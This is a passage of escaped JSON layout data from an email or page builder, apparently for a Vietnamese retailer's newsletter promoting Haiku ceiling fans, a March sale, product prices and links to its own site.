n\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_14\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_32\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#111416\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_23\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"9XGuynNlFn\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"KiUtUTiorY\\\",\\\"contents\\\":[{\\\"id\\\":\\\"nFHzevz2Ys\\\",\\\"type\\\":\\\"menu\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"menu\\\":{\\\"items\\\":[{\\\"key\\\":\\\"1603383850591\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/\\\",\\\"target\\\":\\\"_self\\\"}},\\\"text\\\":\\\"HOME\\\"},{\\\"key\\\":\\\"1603383858336\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/giam-gia\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"text\\\":\\\"\\u0110ANG SALE OFF\\\"},{\\\"key\\\":\\\"1603383867301\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-canh-go\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"text\\\":\\\"QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6\\\"},{\\\"key\\\":\\\"1603383872391\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-cong-nghiep\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"text\\\":\\\"QU\\u1ea0T TR\\u1ea6N HVLS\\\"}]},\\\"fontFamily\\\":{\\\"label\\\":\\\"Arial\\\",\\\"value\\\":\\\"arial,helvetica,sans-serif\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textColor\\\":\\\"#ffffff\\\",\\\"linkColor\\\":\\\"#0068A5\\\",\\\"align\\\":\\\"center\\\",\\\"layout\\\":\\\"horizontal\\\",\\\"separator\\\":\\\"|\\\",\\\"padding\\\":\\\"5px 22px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_menu_1\\\",\\\"htmlClassNames\\\":\\\"u_content_menu\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"_override\\\":{\\\"mobile\\\":{\\\"layout\\\":\\\"vertical\\\",\\\"padding\\\":\\\"8px 8px 5px\\\"}},\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#111416\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"nkA-MY1qR_\\\",\\\"cells\\\":[32,68],\\\"columns\\\":[{\\\"id\\\":\\\"kP7c3hS5Az\\\",\\\"contents\\\":[{\\\"id\\\":\\\"AqPg555pA_\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_4\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>S\\u1eec D\\u1ee4NG N\\u0102NG L\\u01af\\u1ee2NG HI\\u1ec6U QU\\u1ea2<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"gt7TIdGwH6\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/du-an-tieu-bieu-haiku.pdf\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#3AAEE0\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_15\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"- D\\u1ef0 \\u00c1N L\\u1eaeP \\u0110\\u1eb6T -\\\",\\\"calculatedWidth\\\":164,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"4HNAvVw3j1\\\",\\\"contents\\\":[{\\\"id\\\":\\\"EVfwBXUg9l\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 30px 40px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ced4d9\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_8\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">V\\u1edbi kh\\u00f4ng gian Nh\\u00e0 \\u1ede n\\u01a1i c\\u00f3 con ng\\u01b0\\u1eddi sinh ho\\u1ea1t h\\u00e0ng n\\u00e0y. Qu\\u1ea1t tr\\u1ea7n nh\\u00e0 \\u1edf d\\u00e2n d\\u1ee5ng s\\u1ebd gi\\u00fap tho\\u1ea3i m\\u00e1i kh\\u00f4ng gian th\\u00f4ng tho\\u00e1ng c\\u1ea3 ng\\u00e0y. Th\\u00eam m\\u1ed9t c\\u1ea3m bi\\u1ebfn chuy\\u1ec3n \\u0111\\u1ed9ng t\\u00edch h\\u1ee3p s\\u1ebd b\\u1eadt\\/t\\u1eaft qu\\u1ea1t b\\u00e1n t\\u1ef1 \\u0111\\u1ed9ng, trong khi c\\u00e1c c\\u1ea3m bi\\u1ebfn m\\u00f4i tr\\u01b0\\u1eddng li\\u00ean t\\u1ee5c theo d\\u00f5i t\\u00ecnh tr\\u1ea1ng ph\\u00f2ng c\\u1ee7a b\\u1ea1n. Ch\\u1ec9 c\\u1ea7n \\u0111\\u1eb7t t\\u00f9y ch\\u1ecdn \\u0111\\u1ec3 t\\u1ef1 \\u0111\\u1ed9ng qu\\u1ea3n l\\u00fd lu\\u1ed3ng kh\\u00f4ng kh\\u00ed v\\u00e0 \\u00e1nh s\\u00e1ng LED c\\u1ea7n thi\\u1ebft \\u0111\\u1ec3 gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i b\\u1ea5t c\\u1ee9 l\\u00fac n\\u00e0o.<\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#111416\\\",\\\"columnsBackgroundColor\\\":\\\"#111416\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"Lh01KT4742\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"YPcxKW0bL1\\\",\\\"contents\\\":[{\\\"id\\\":\\\"QFxol5LSWl\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 18px; line-height: 25.2px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 25.2px; font-size: 18px;\\\\\\\">SALE OFF<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"50oHQS9KBh\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#383a3c\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><span style=\\\\\\\"font-size: 38px; line-height: 45.6px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 45.6px; font-family: \'Open Sans\', sans-serif; font-size: 38px;\\\\\\\">CH\\u01af\\u01a0NG TR\\u00ccNH GI\\u1ea2M GI\\u00c1 T3<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"OkTyVEU8-N\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 0px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_8\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 20px; line-height: 28px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 28px; font-size: 20px;\\\\\\\"><span style=\\\\\\\"color: #db1908; line-height: 28px; font-size: 20px;\\\\\\\">GI\\u00c1 T\\u1ed0T NH\\u1ea4T<\\/span> T\\u1eea HAMILTON AIR<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"PbNE9MySh0\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"gWIFbweT7m\\\",\\\"contents\\\":[{\\\"id\\\":\\\"kR188iMYu6\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678763735498-L-caramel-wh.jpg\\\",\\\"width\\\":360,\\\"height\\\":240,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":true},\\\"textAlign\\\":\\\"left\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_3\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"kpsfr-HGAa\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>HAIKU L SERIES<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"zQWRi0C_rw\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#111416\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_13\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>CARAMEL WHITE 52\\\\\\\"<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"BnbBoNCpLG\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">23.8 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">19.0 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"Ywz0lJEblu\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l-cao-cap-52inch-mau-caramel.html\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"5px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_3\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u0110\\u1eb6T H\\u00c0NG\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":120,\\\"calculatedHeight\\\":47}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"ZnXDn5Opvc\\\",\\\"contents\\\":[{\\\"id\\\":\\\"P5OtO300Rz\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678763684307-cocoa_bamboo.jpg\\\",\\\"width\\\":360,\\\"height\\\":240},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_4\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"pending\\\":false,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"YevU_4k3GY\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_9\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>HAIKU H - SMART CEILING FANS<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"52iCw45boK\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#111416\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>COCOA BAMBOO - 